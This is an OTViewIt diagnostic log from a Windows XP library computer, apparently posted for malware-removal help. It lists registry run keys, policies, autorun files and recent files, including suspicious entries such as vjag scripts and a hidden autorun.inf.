[2007/11/13 05:25:53 | 00,020,480 | ---- | M] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) -- C:\WINDOWS\system32\drivers\secdrv.sys -- (Secdrv [On_Demand | Stopped])
[2004/09/17 09:02:54 | 00,732,928 | ---- | M] (Creative Technology Ltd.) -- C:\WINDOWS\system32\drivers\senfilt.sys -- (senfilt [On_Demand | Running])
[2005/01/27 15:31:06 | 00,260,352 | ---- | M] (Analog Devices, Inc.) -- C:\WINDOWS\system32\drivers\smwdm.sys -- (smwdm [On_Demand | Running])
[2008/09/24 18:09:37 | 00,014,976 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\SophosBootDriver.sys -- (SophosBootDriver [Disabled | Stopped])

========== (R ) Internet Explorer ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"=http://www.vview.net
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896
"Default_Secondary_Page_URL"=
"Extensions Off Page"=about:NoAdd-ons
"Local Page"=%SystemRoot%\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Security Risk Page"=about:SecurityRisk
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
"SearchAssistant"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Internet Explorer\Main]
"Local Page"=C:\WINDOWS\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

========== (O1) Hosts File ==========

HOSTS File = (734 bytes) - C:\WINDOWS\System32\drivers\etc\Hosts
First 25 entries...
127.0.0.1 localhost

========== (O2) BHO's ==========

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (HKLM) -- C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
{201f27d4-3704-41d6-89c1-aa35e39143ed} (HKLM) -- C:\Program Files\AskBarDis\bar\bin\askBar.dll ()
{39EA7695-B3F2-4C44-A4BC-297ADA8FD235} (HKLM) -- C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll (Sophos Plc)
{53707962-6F74-2D53-2644-206D7942484F} (HKLM) -- C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
{67BCF957-85FC-4036-8DC4-D4D80E00A77B} (HKLM) -- C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll (SMART Technologies Inc.)
{DBC80044-A445-435b-BC74-9C25C1C588A9} (HKLM) -- C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
{E7E6F031-17CE-4C07-BC86-EABFE594F69C} (HKLM) -- C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)

========== (O3) Toolbars ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{3041d03e-fd4b-44e0-b742-2d9b88305f98}" (HKLM) -- C:\Program Files\AskBarDis\bar\bin\askBar.dll ()

========== (O4) Run Keys ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" (Adobe Systems Incorporated)
"igfxhkcmd"=C:\WINDOWS\system32\hkcmd.exe (Intel Corporation)
"igfxpers"=C:\WINDOWS\system32\igfxpers.exe (Intel Corporation)
"igfxtray"=C:\WINDOWS\system32\igfxtray.exe (Intel Corporation)
"ISUSPM Startup"=C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup (InstallShield Software Corporation)
"ISUSScheduler"="C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start (InstallShield Software Corporation)
"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe" (Apple Inc.)
"PDVDDXSrv"="C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe" (CyberLink Corp.)
"SoundMAXPnP"=C:\Program Files\Analog Devices\Core\smax4pnp.exe (Analog Devices, Inc.)
"SunJavaUpdateSched"="C:\Program Files\Java\jre6\bin\jusched.exe" (Sun Microsystems, Inc.)
"vjag"=C:\WINDOWS\system32\auto\vjag3.bat ()
"vjag2"=C:\WINDOWS\system32\auto\vjag.vbs ()
"Windows Defender"="C:\Program Files\Windows Defender\MSASCui.exe" -hide (Microsoft Corporation)

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)

========== (O4) RunOnce Keys ==========

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"=Narrator.exe (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"=Narrator.exe (Microsoft Corporation)

========== (O4) Startup Folders ==========

[2009/01/28 07:24:29 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe

========== (O6 & O7) Current Version Policies ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"HonorAutoRunSetting"=1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"HideStartupScripts"=0

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145
"Restrictrun"=1

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\restrictrun]
"1"=vjag.vbs
"2"=C:\WINDOWS\system32\notepad.exe -- [2008/04/14 05:42:30 | 00,069,120 | ---- | M] (Microsoft Corporation)
"3"=winword.exe
"4"=C:\WINDOWS\explorer.exe -- [2008/04/14 05:42:20 | 01,033,728 | ---- | M] (Microsoft Corporation)
"5"=powerpnt.exe
"6"=vj.doc
"7"=excel.exe
"8"=vjag1.bat
"9"=vjag2.vbs
"10"=vjag.bat
"11"=vjag2.bat
"12"=vstart.bat
"13"=autorun.inf
"14"=C:\WINDOWS\system32\vjag.doc -- [2009/04/01 08:54:10 | 00,001,844 | -HS- | M] ()

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

========== (O9) IE Extensions ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
{92780B25-18CC-41C8-B9BE-3C9C571A8263}: Button: Research -- %ProgramFiles%\Microsoft Office\Office12\REFIEBAR.DLL [2006/10/26 20:12:22 | 00,040,424 | ---- | M] (Microsoft Corporation)
{DFB852A3-47F8-48C4-A200-58CAB36FD2A2}: Menu: Spybot - Search && Destroy Configuration -- %ProgramFiles%\Spybot - Search & Destroy\SDHelper.dll [2009/01/26 15:31:02 | 01,879,896 | ---- | M] (Safer Networking Limited)
{e2e2dd38-d088-4134-82b7-f2ba38496583}: Menu: @xpsp3res.dll,-20001 -- %SystemRoot%\network diagnostic\xpnetdiag.exe [2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Button: Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Menu: Windows Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
CmdMapping\\{FB5F1910-F110-11d2-BB9E-00C04F795683} [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
CmdMapping\\{FB5F1910-F110-11d2-BB9E-00C04F795683} [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

========== (O12) Internet Explorer Plugins ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\]
PluginsPage: "" = http://activex.microsoft.com/controls/find...=%s&mime=%s
PluginsPageFriendlyName: "" = Microsoft ActiveX Gallery

========== (O13) Default Prefixes ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

========== (O15) Trusted Sites ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\]
1 domain(s) and sub-domain(s) not assigned to a zone.

========== (O16) DPF ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\]
{166B1BCA-3F9C-11CF-8075-444553540000}: http://fpdownload.macromedia.com/get/shock...director/sw.cab -- Shockwave ActiveX Control
{6414512B-B978-451D-A0D8-FCFDF33E833C}: http://www.update.microsoft.com/windowsupd...b?1207692023140 -- WUWebControl Class
{8AD9C840-044E-11D1-B3E9-00805F499D93}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13
{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}: http://fpdownload.macromedia.com/get/flash...t/ultrashim.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13

========== (O17) DNS Name Servers ==========

{29FD7304-5CDF-4582-9D6B-1D5C0F2E5860} (Servers: | Description: )
{346168FD-2809-4FCB-832C-E763CD35D89D} (Servers: | Description: Broadcom NetXtreme 57xx Gigabit Controller)

========== (O20) AppInit_DLLs ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_Dlls"=C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
>[2009/04/02 05:00:31 | 00,164,864 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sophos_detoured.dll

========== (O20) Winlogon Notify Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\]
igfxcui: "DllName" = igfxdev.dll -- C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)

========== Shell Execute Hooks ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{091EB208-39DD-417D-A5DD-7E2C2D8FB9CB}" (HKLM) -- C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)

========== Safeboot Options ==========

"AlternateShell"=cmd.exe

========== CDRom AutoRun Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]
"AutoRun" = 1

========== Autorun Files on Drives ==========

auto []
[2009/03/20 08:56:44 | 00,000,000 | -HSD | M] -- C:\auto -- [ NTFS ]

AUTOEXEC.BAT []
[2008/04/08 16:45:12 | 00,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT -- [ NTFS ]
Unable to obtain root file information for disk C:\

autorun.inf [[autorun] | shell=open | ]
[2001/06/19 06:18:46 | 00,000,021 | R--- | M] () -- D:\autorun.inf -- [ CDFS ]
Unable to obtain root file information for disk E:\

========== MountPoints2 ==========

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{eea0ca55-325e-11dd-9de7-806d6172696f}\Shell]
""=Autorun

========== Files/Folders - Created Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 14:57:18 | 00,422,912 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\Desktop\powerpnt.exe.exe
[2009/04/01 13:49:56 | 04,840,017 | ---- | C] () -- C:\Documents and Settings\administrator.VVIEW\Desktop\Virus Script.rtf
[2009/04/01 13:34:39 | 00,000,000 | -H-D | C] -- C:\WINDOWS\System32\GroupPolicy
[2009/04/01 10:06:40 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Sun
[2009/04/01 09:50:54 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\GlarySoft
[2009/04/01 09:49:15 | 00,000,000 | ---D | C] -- C:\Program Files\AskBarDis
[2009/04/01 09:49:15 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Mozilla
[2009/04/01 09:42:37 | 00,000,410 | ---- | C] () -- C:\WINDOWS\tasks\Schedule Task Weekly.job
[2009/04/01 09:42:31 | 00,000,000 | ---D | C] -- C:\Program Files\Registry Easy
[2009/04/01 09:15:17 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Auslogics
[2009/04/01 09:05:24 | 00,000,000 | ---- | C] () -- C:\WINDOWS\System32\MSVolume.dll
[2009/04/01 09:05:20 | 00,000,000 | ---D | C] -- C:\Program Files\Registry_Cleaner_Pro
[2009/04/01 09:02:08 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\TEMP
@Alternate Data Stream - 116 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:D1B5B4F1
[2009/04/01 09:02:00 | 00,000,000 | ---D | C] -- C:\Program Files\Registry Mechanic
[2009/04/01 08:54:48 | 00,000,162 | -H-- | C] () -- C:\WINDOWS\System32\~$vjag.doc
[2009/04/01 08:18:36 | 00,000,000 | ---D | C] -- C:\Program Files\Spybot - Search & Destroy
[2009/04/01 08:18:36 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
[2009/04/01 08:00:27 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Macromedia
[2009/04/01 07:57:50 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Adobe
[2009/03/31 16:26:03 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Local Settings\Application Data\Sophos
[2009/03/31 16:25:00 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\U3
[2009/03/20 09:03:58 | 02,441,022 | -HS- | C] () -- C:\autorun.inf
[2009/03/20 08:57:33 | 00,000,000 | -HSD | C] -- C:\auto
[2009/03/20 08:56:46 | 00,001,844 | -HS- | C] () -- C:\WINDOWS\System32\vjag.doc
[2009/03/20 08:56:44 | 00,000,000 | RHSD | C] -- C:\WINDOWS\System32\auto
[2009/03/20 08:56:12 | 00,021,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\hidserv.dll
[2009/03/20 08:56:12 | 00,021,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\hidserv.dll
[2009/03/20 08:56:06 | 00,032,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\drivers\usbccgp.sys
[2009/03/20 08:56:06 | 00,032,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\usbccgp.sys
[2009/03/06 13:11:08 | 00,000,000 | ---D | C] -- C:\Library
[2009/03/06 13:10:37 | 00,000,000 | ---D | C] -- C:\Program Files\PEM
[2009/03/06 13:10:32 | 00,000,000 | -H-D | C] -- C:\Program Files\Zero G Registry
[2009/03/06 13:10:32 | 00,000,000 | ---D | C] -- C:\Program Files\TestNav
[2009/02/11 16:01:29 | 00,000,000 | ---D | C] -- C:\WINDOWS\SQL9_KB960089_ENU

========== Files - Modified Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 14:57:36 | 02,441,022 | -HS- | M] () -- C:\autorun.inf
[2009/04/02 14:55:44 | 00,000,402 | ---- | M] () -- C:\WINDOWS\tasks\gpupdate.job
[2009/04/02 14:55:42 | 00,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2009/04/02 14:55:17 | 00,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2009/04/02 14:51:54 | 00,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2009/04/02 14:51:46 | 00,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2009/04/02 14:23:20 | 05,362,852 | -H-- | M] () -- C:\Documents and Settings\administrator.VVIEW\Local Settings\Application Data\IconCache.db
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\Desktop\powerpnt.exe.exe
[2009/04/01 13:49:56 | 04,840,017 | ---- | M] () -- C:\Documents and Settings\administrator.VVIEW\Desktop\Virus Script.rtf
[2009/04/01 12:00:53 | 00,000,410 | ---- | M] () -- C:\WINDOWS\tasks\Schedule Task Weekly.job
[2009/04/01 09:05:24 | 00,000,000 | ---- | M] () -- C:\WINDOWS\System32\MSVolume.dll
[2009/04/01 08:54:48 | 00,000,162 | -H-- | M] () -- C:\WINDOWS\System32\~$vjag.doc
[2009/04/01 08:54:10 | 00,001,844 | -HS- | M] () -- C:\WINDOWS\System32\vjag.doc
[2009/03/23 08:15:27 | 00,001,724 | -H-- | M] () -- C:\Documents and Settings\administrator.VVIEW\My Documents\Default.rdp
[2009/03/20 16:04:01 | 00,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
[2009/03/20 13:27:06 | 00,000,072 | ---- | M] () -- C:\WINDOWS\bi_group.ini
[2009/03/20 09:08:14 | 00,523,324 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI
[2009/03/20 09:08:14 | 00,488,332 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2009/03/20 09:08:14 | 00,088,830 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2009/03/16 15:07:22 | 00,278,152 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2009/03/16 15:01:22 | 00,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2009/02/26 06:02:48 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccessfilter.sys
[2009/02/26 06:02:37 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccesscontrol.sys
[2009/02/25 15:54:59 | 24,768,960 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\MRT.exe
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\win32k.sys
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\win32k.sys

========== Custom Scans ==========

< End of report >


extras
OTViewIt Extras logfile created on: 4/2/2009 2:57:43 PM - Run
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\administrator.VVIEW\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.99 Gb Total Physical Memory | 1.30 Gb Available Physical Memory | 65.48% Memory free
3.84 Gb Paging File | 3.31 Gb Available in Paging File | 86.22% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.50 Gb Total Space | 61.36 Gb Free Space | 82.37% Space Free | Partition Type: NTFS
Drive D: | 64.77 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive E: | 1.86 Gb Total Space | 0.15 Gb Free Space | 8.30% Space Free | Partition Type: FAT
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 103_LIB_S3
Current User Name: Administrator
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled"=1
"AntiVirusDisableNotify"=0
"FirewallDisableNotify"=0
"UpdatesDisableNotify"=0
"AntiVirusOverride"=0
"FirewallOverride"=0
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
"DisableMonitoring"=1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
"EnableFirewall"=0
"DoNotAllowExceptions"=0
"DisableNotifications"=0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts]

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour
[2008/03/30 10:36:34 | 20,638,504 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes
[2008/05/21 04:37:24 | 12,844,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook
